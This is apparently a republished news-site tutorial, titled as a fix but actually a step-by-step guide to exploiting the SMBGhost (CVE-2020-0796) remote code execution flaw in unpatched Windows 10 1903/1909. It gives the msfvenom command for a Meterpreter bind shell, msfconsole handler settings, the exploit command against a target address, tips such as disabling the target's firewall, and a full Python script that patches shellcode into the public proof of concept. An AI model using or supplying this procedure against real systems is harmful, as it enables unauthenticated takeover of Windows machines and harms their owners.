
How to resolve the CVE-2020-0796 RCE vulnerability

2025-04-01 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 report

In this issue the editor walks through how to reproduce the CVE-2020-0796 (SMBGhost) remote code execution vulnerability. The write-up is practical and written from a practitioner's point of view; I hope you take something away from it.

Vulnerability introduction

Microsoft SMBv3 Client/Server Remote Code Execution Vulnerability, CVE-2020-0796 (commonly called SMBGhost). The bug is in the SMBv3.1.1 compression support: an integer overflow when the server (srv2.sys) or the client handles a compressed message lets a remote, unauthenticated attacker corrupt kernel memory and run code. Microsoft fixed it in KB4551762.

Affected versions:

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

Reproduction pitfalls (read these before trying it yourself)

Exploit (PoC) address:

https://github.com/chompie1337/SMBGhost_RCE_PoC

The Windows 10 builds the exploit works on are limited (unpatched 1903 and 1909, per the list above). The build I succeeded on is shown below.

Download address

Python version

Python 3.6 works.

Python 3.7 and Python 2 both blue-screened the target in my tests.

I don't know why; if someone who knows can explain it, please do.

The payload must be a bind shell (the target listens and the attacker connects in), not a reverse shell.

The patch state is also a trap. The target showed no KB4551762, but Windows 10 updates are cumulative, so even a machine with only a few patches listed may already contain this fix.

Windows Defender Firewall must be turned off on the target; otherwise the inbound connection to the bind-shell port is blocked.

Reproduction steps

First, check the target for the patch (KB4551762) with systeminfo.

The install is brand new, so it is definitely not patched.

Generate the payload with msfvenom

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

-f python emits the shellcode as a series of buf += b"..." lines, -b '\x00' tells the encoder to avoid null bytes, and -i 1 runs the encoder once. Note the LPORT: the handler below must connect to the same port.

Paste the shellcode into the exploit

Replace the value of USER_PAYLOAD in exploit.py with the contents of buf from the msfvenom output.

Start the handler in msfconsole (lport must match the LPORT baked into the payload; rhost is the target's address, the same host exploit.py is pointed at):

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.31.235
run

Run the exploit against the target

python3 exploit.py -ip 192.168.100.54

Once the exploit lands, the handler connects to the bind shell on the target and the Meterpreter session comes back: we have a shell.
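Copying a few hundred bytes of shellcode into USER_PAYLOAD by hand is the easiest place to make a mistake in this procedure, and a mistake here costs a blue screen rather than an error message. The script below is an added example for this write-up, not code from the SMBGhost_RCE_PoC repo: it reassembles the msfvenom -f python output, refuses it if null bytes survived (the command above uses -b '\x00'), and rewrites the USER_PAYLOAD line in exploit.py. It assumes exploit.py contains exactly one line of the form USER_PAYLOAD = b"..." and that the shellcode is in msfvenom's python format; the sample shellcode and exploit stub embedded in it are constructed, not a working payload.

```python
"""Patch msfvenom shellcode into the PoC's USER_PAYLOAD.

Added example for this write-up, not code from the SMBGhost_RCE_PoC repo.
Assumptions: exploit.py contains exactly one line of the form
USER_PAYLOAD = b"..."  and the shellcode comes from  msfvenom -f python,
i.e. lines of the form  buf += b"\\x..".
"""
import ast
import re
import sys
from pathlib import Path

# Constructed sample of msfvenom -f python output (20 made-up bytes, NOT a
# working payload). Real output is several hundred bytes of buf += lines.
MSFVENOM_OUTPUT = r'''buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
'''

# Constructed sample generated WITHOUT -b '\x00': it still contains null
# bytes, which the write-up's msfvenom command strips.
MSFVENOM_OUTPUT_WITH_NULLS = r'''buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
'''

# Constructed stand-in for the one line of exploit.py we care about.
EXPLOIT_STUB = '''import sys
USER_PAYLOAD = b""

def main():
    pass
'''

BUF_LINE = re.compile(r'^\s*buf\s*\+?=\s*(b"(?:\\x[0-9a-fA-F]{2})*")\s*$')
USER_PAYLOAD_LINE = re.compile(r'^(USER_PAYLOAD[ \t]*=[ \t]*)b"[^"\n]*"[ \t]*$', re.M)


def parse_msfvenom_python(text):
    """Reassemble the shellcode from msfvenom -f python output.

    Each literal is evaluated with ast.literal_eval (never exec), so a
    tampered shellcode file cannot run code on the attacker's box.
    """
    payload = bytearray()
    matched = 0
    for line in text.splitlines():
        m = BUF_LINE.match(line)
        if m:
            matched += 1
            payload += ast.literal_eval(m.group(1))
    if matched == 0:
        raise ValueError("no 'buf = / buf +=' lines found; was -f python used?")
    return bytes(payload)


def find_bad_char(payload, bad=b"\x00"):
    """Return the offset of the first bad char, or -1 if the payload is clean."""
    hits = [payload.find(bytes([c])) for c in bad]
    hits = [h for h in hits if h != -1]
    return min(hits) if hits else -1


def to_python_literal(payload):
    """Render bytes as the \\x-escaped bytes literal exploit.py expects."""
    return 'b"' + "".join("\\x{:02x}".format(b) for b in payload) + '"'


def patch_exploit(source, payload):
    """Replace the USER_PAYLOAD assignment; refuse unless it is found exactly once."""
    literal = to_python_literal(payload)
    # A function replacement is used so the backslashes are inserted verbatim.
    new_src, n = USER_PAYLOAD_LINE.subn(lambda m: m.group(1) + literal, source)
    if n != 1:
        raise ValueError("expected exactly one USER_PAYLOAD assignment, found {}".format(n))
    return new_src


def build(source, msfvenom_text, bad=b"\x00"):
    """Parse, check for bad chars, patch. Returns (patched_source, payload_len)."""
    payload = parse_msfvenom_python(msfvenom_text)
    off = find_bad_char(payload, bad)
    if off != -1:
        raise ValueError("bad char 0x{:02x} at offset {}; regenerate with -b".format(payload[off], off))
    return patch_exploit(source, payload), len(payload)


if __name__ == "__main__":
    # Usage: python3 patch_payload.py exploit.py shellcode.txt > exploit_patched.py
    if len(sys.argv) == 3:
        src = Path(sys.argv[1]).read_text()
        venom = Path(sys.argv[2]).read_text()
    else:
        src, venom = EXPLOIT_STUB, MSFVENOM_OUTPUT
    patched, size = build(src, venom)
    sys.stderr.write("embedded {} bytes of shellcode\n".format(size))
    sys.stdout.write(patched)
```

Save msfvenom's output to shellcode.txt, run the script against the PoC's exploit.py, and diff the result before using it; the bad-char check is what catches a payload generated without -b '\x00', which would otherwise only show up as a crash on the target.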

That is how to reproduce the CVE-2020-0796 RCE vulnerability. If you run into the same problems, refer back to the pitfalls above. For more on the topic, follow the industry information channel.


© 2024 shulou.com SLNews company. All rights reserved.
